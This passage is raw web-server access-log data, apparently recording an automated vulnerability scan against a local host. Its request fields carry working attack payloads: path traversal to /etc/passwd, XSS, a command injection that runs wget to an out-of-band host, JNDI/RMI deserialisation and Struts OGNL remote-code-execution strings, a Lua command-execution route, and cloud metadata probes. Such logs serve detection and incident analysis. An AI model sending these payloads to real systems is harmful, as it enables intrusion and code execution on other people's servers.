+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/elFinder.version.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/go/km/navigation/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/setup.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRAuth/app/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zentao/index.php?mode=getconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php?wlcms-action=preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.original HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.454","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://ca28fg0smpvbd3qg07h0r69ox6cqji5bx.oast.live; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.428","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.374","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%2729KD1v83pbhiWLMcuAxlbvMB3kp%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joommyadmin/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KD26JZQuNp8V4skLEBAoCmg1O HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\x22onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22LL\x5Cu0063\x5Cu006f\x5Cu006d.sun.rowset.JdbcRowSetImpl;;\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca28fg0smpvbd3qg07h0wna1rcisw91tx.oast.live/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.shiro.jndi.JndiObjectFactory\x22,\x0D\x0A \x22resourceName\x22:\x22rmi://ca28fg0smpvbd3qg07h0amnhpqm61om88.oast.live/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v0.1/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-app.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"errorpage=/etc/passwd&obj-action=auth&:action=login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/webproc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_wpeprivate/config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"{\x0D\x0A \x22uri\x22:\x22/29KD22w3ueBEEOrXPY58YpQFZAG\x22,\x0D\x0A \x22script\x22:\x22local _M = {} \x5Cn function _M.access(conf, ctx) \x5Cn local os = require('os')\x5Cn local args = assert(ngx.req.get_uri_args()) \x5Cn local f = assert(io.popen(args.cmd, 'r'))\x5Cn local s = assert(f:read('*a'))\x5Cn ngx.say(s)\x5Cn f:close() \x5Cn end \x5Cnreturn _M\x22,\x0D\x0A \x22upstream\x22:{\x0D\x0A \x22type\x22:\x22roundrobin\x22,\x0D\x0A \x22nodes\x22:{\x0D\x0A \x22example.com:80\x22:1\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/routes HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache-default/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 